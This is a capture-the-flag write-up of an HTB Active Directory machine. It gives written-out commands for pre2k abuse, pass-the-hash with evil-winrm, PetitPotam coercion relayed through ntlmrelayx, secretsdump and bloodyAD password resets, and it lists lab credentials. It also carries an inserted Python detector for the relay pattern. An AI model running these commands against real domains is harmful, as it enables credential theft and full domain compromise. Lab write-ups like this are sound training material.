HTB-Season10-Pirate

Welcome back, my dear hackers! This write-up is a walkthrough for the Pirate machine from HTB. If you are interested, please take a look at my other write-ups. Without any further delay, let's dive in:


Initial Enumeration

Let's start with a classic enumeration using Nmap:

[Screenshot: Nmap scan results and open ports]

I poked around these services but found nothing immediately exploitable. Moving on to Active Directory enumeration, I used BloodHound to map out the possible paths to initial access and discovered two Pre-Windows 2000 compatible computer accounts in the domain.

To exploit this and gather more information, I used NetExec (nxc):

nxc ldap pirate.htb -u 'pentest' -p 'p3ntt3st2025!&' -M pre2k

[Screenshot: nxc pre2k module output]

This command gets us tickets for the enumerated computer accounts (MS01$, EXCH01$). With that access we can dump the Group Managed Service Account (gMSA) passwords, which hands us two highly privileged service accounts (gMSA_ADCS_prod$, gMSA_ADFS_prod1$) along with their NTLM hashes. Voila!

[Screenshot: gMSA password dump]

Initial Foothold & Pivoting

We just found our way in. Using Evil-WinRM and the hash we just dumped, we can get a remote shell as the gMSA_ADFS_prod1$ user:

evil-winrm -i <target_ip> -u 'gMSA_ADFS_prod1$' -H '<NTLM-HASH>'

During internal enumeration on this machine, I came across an isolated internal network (IP range: 192.168.100.0/24). To reach this subnet, I set up a pivot using Ligolo-ng.

[Screenshot: Ligolo-ng pivot setup]

Lateral Movement: PetitPotam (LDAP Relay)

Further enumeration reveals that the Domain Controller is vulnerable to CVE-2021-36942, better known as PetitPotam. PetitPotam is a critical vulnerability that lets unauthenticated attackers trigger an NTLM relay attack: by abusing the Microsoft Encrypting File System Remote Protocol (MS-EFSRPC), an attacker can coerce a Domain Controller (DC) into authenticating to an attacker-controlled server.

First, we set up ntlmrelayx on our Kali machine to catch the coerced authentication and relay it to LDAP, creating a rogue machine account with delegation rights:

impacket-ntlmrelayx -t ldaps://<DC-IP> --delegate-access -smb2support

[Screenshot: ntlmrelayx waiting for connections]

Next, we trigger the PetitPotam exploit against the Domain Controller, telling it to authenticate back to our Ligolo tunneled IP:

python3 PetitPotam.py <our-ligolo-IP> <DC-IP>

[Screenshot: PetitPotam trigger output]

In the relay server log we can see that we received credentials: username IBWSROCF$, password hFP-YJru<\f5>mBR. Using these credentials we request a Kerberos service ticket with impacket-getST.
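As an added defensive example (not part of the original write-up), the following Python flags the trace this relay leaves in the DC's Security log: a computer account created (event 4741) by a subject that is itself a machine account, followed shortly by a write to msDS-AllowedToActOnBehalfOfOtherIdentity (event 5136) from the same subject. The events are a constructed sample, and the DC hostname DC01 is assumed.

```python
from datetime import datetime, timedelta

# Constructed sample of already-parsed Security events (not real logs from the box).
# 4741 = computer account created, 5136 = directory service object modified.
SAMPLE_EVENTS = [
    {"id": 4741, "time": "2026-03-02T22:27:10", "subject": "DC01$", "target": "IBWSROCF$"},
    {"id": 5136, "time": "2026-03-02T22:27:11", "subject": "DC01$",
     "target": "CN=DC01,OU=Domain Controllers,DC=pirate,DC=htb",
     "attr": "msDS-AllowedToActOnBehalfOfOtherIdentity"},
    # benign domain join by a human account, followed by a harmless attribute write
    {"id": 4741, "time": "2026-03-02T09:15:00", "subject": "j.doe", "target": "WS07$"},
    {"id": 5136, "time": "2026-03-02T09:15:02", "subject": "j.doe",
     "target": "CN=WS07,CN=Computers,DC=pirate,DC=htb", "attr": "dNSHostName"},
]

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"


def find_relay_rbcd(events, window=timedelta(minutes=5)):
    """Return alerts for a machine-account creation whose subject is a machine
    account (the signature of relayed computer authentication) that is followed
    within `window` by an RBCD attribute write from the same subject."""
    alerts = []
    rbcd_writes = [e for e in events if e["id"] == 5136 and e.get("attr") == RBCD_ATTR]
    for created in (e for e in events if e["id"] == 4741):
        if not created["subject"].endswith("$"):
            continue  # a human account joining a workstation is routine
        t0 = datetime.fromisoformat(created["time"])
        for write in rbcd_writes:
            delta = datetime.fromisoformat(write["time"]) - t0
            if write["subject"] == created["subject"] and timedelta(0) <= delta <= window:
                alerts.append({
                    "subject": created["subject"],
                    "new_account": created["target"],
                    "rbcd_target": write["target"],
                    "seconds_apart": int(delta.total_seconds()),
                })
    return alerts


if __name__ == "__main__":
    for a in find_relay_rbcd(SAMPLE_EVENTS):
        print(f"ALERT: {a['subject']} created {a['new_account']} and granted it RBCD "
              f"on {a['rbcd_target']} {a['seconds_apart']}s later")
```

Event 5136 is only written when object-level auditing (a SACL covering attribute writes) is configured on the computer objects, so the second half of this rule depends on that audit policy being in place.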

With the Kerberos ticket we use impacket-secretsdump to dump the secrets of the Domain Controller. The output clearly shows the Administrator user along with its hash. We then use the Administrator account for a complete secrets dump, where we find the credentials of the user a.white:E2nvADKSz5Xz2MJu.

[Screenshot: secretsdump output]

(Don't forget to grab your user flag here!) User Flag:

[Screenshot: user flag]

Privilege Escalation

Remember the BloodHound data from earlier? Looking at the permissions of a.white, we can see that this user is allowed to change the password of a.white_adm, who has administrative privileges. Using bloodyAD, we change that password.

[Screenshot: bloodyAD password change]

Next, using bloodyAD we update the servicePrincipalName so that we can forge ourselves a Kerberos ticket with admin privileges.

[Screenshots: servicePrincipalName update and ticket request]

Using the ticket and impacket-psexec we will be able to claim our root flag:

[Screenshot: impacket-psexec shell and root flag]
